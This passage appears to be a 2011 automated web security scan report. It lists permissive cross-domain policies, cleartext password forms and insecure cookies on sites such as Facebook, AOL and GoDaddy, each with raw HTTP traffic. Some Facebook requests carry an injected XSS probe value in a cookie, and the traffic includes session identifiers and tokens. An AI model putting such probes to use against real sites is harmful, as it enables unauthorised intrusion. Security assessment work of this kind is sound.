<cross-domain-policy>
<allow-access-from domain="*.meebo.com" />
</cross-dom
...[SNIP]...

3.22. http://www.pageflakes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pageflakes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 266
Content-Type: text/xml
Last-Modified: Sat, 30 Aug 2008 02:30:03 GMT
Accept-Ranges: bytes
ETag: "462324f48ac91:430e2"
Server: Microsoft-IIS/6.0
From: web10
Date: Thu, 05 May 2011 10:58:53 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pageflakes.com"/>
<allow-access-from domain="*.livevideo.com"/>
<allow-access-from domain="*.meandmypage.com"/>
<allow-access-from domain="*.solesite.com"/>
...[SNIP]...

3.23. http://www.popeater.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popeater.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

3.24. http://www.realtytrac.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.realtytrac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realtytrac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Expires: Fri, 09 Oct 2020 00:00:00 GMT
Last-Modified: Fri, 21 May 2010 19:20:10 GMT
Accept-Ranges: bytes
ETag: "011ea11af9ca1:0"
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml",CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Thu, 05 May 2011 01:00:22 GMT
Connection: close
Content-Length: 170

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.realtytrac.com" />
   <allow-access-from domain="*.erealinvestor.com" />
</cross-domain-policy>

3.25. http://www.tuaw.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tuaw.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tuaw.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

3.26. http://www.truveo.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:01 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 21:11:01 GMT
Accept-Ranges: bytes
Content-Length: 100
Access-Control-Allow-Oritin: *
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
</cross-domain-policy>


4. Silverlight cross-domain policy  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=56
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://www.facebook.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

5.2. http://www.facebook.com/r.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.252.126
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 29390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

5.3. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>


<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
<br />
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

5.4. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
Content-Type: text/html
Content-Length: 63415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>


<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
<br />
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

6. SSL cookie without secure flag set  previous  next
There are 17 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


6.1. https://www.fightmagazine.com/mma-magazine/subscribe.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.fightmagazine.com
Path:   /mma-magazine/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:57:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16739
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...

6.2. https://www.godaddy.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

6.3. https://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

6.4. https://www.facebook.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.5. https://www.facebook.com/ajax/intl/language_dialog.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.20.120
Connection: close
Date: Thu, 05 May 2011 10:56:54 GMT
Content-Length: 40729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.6. https://www.facebook.com/h02332  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

6.7. https://www.facebook.com/h02332  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
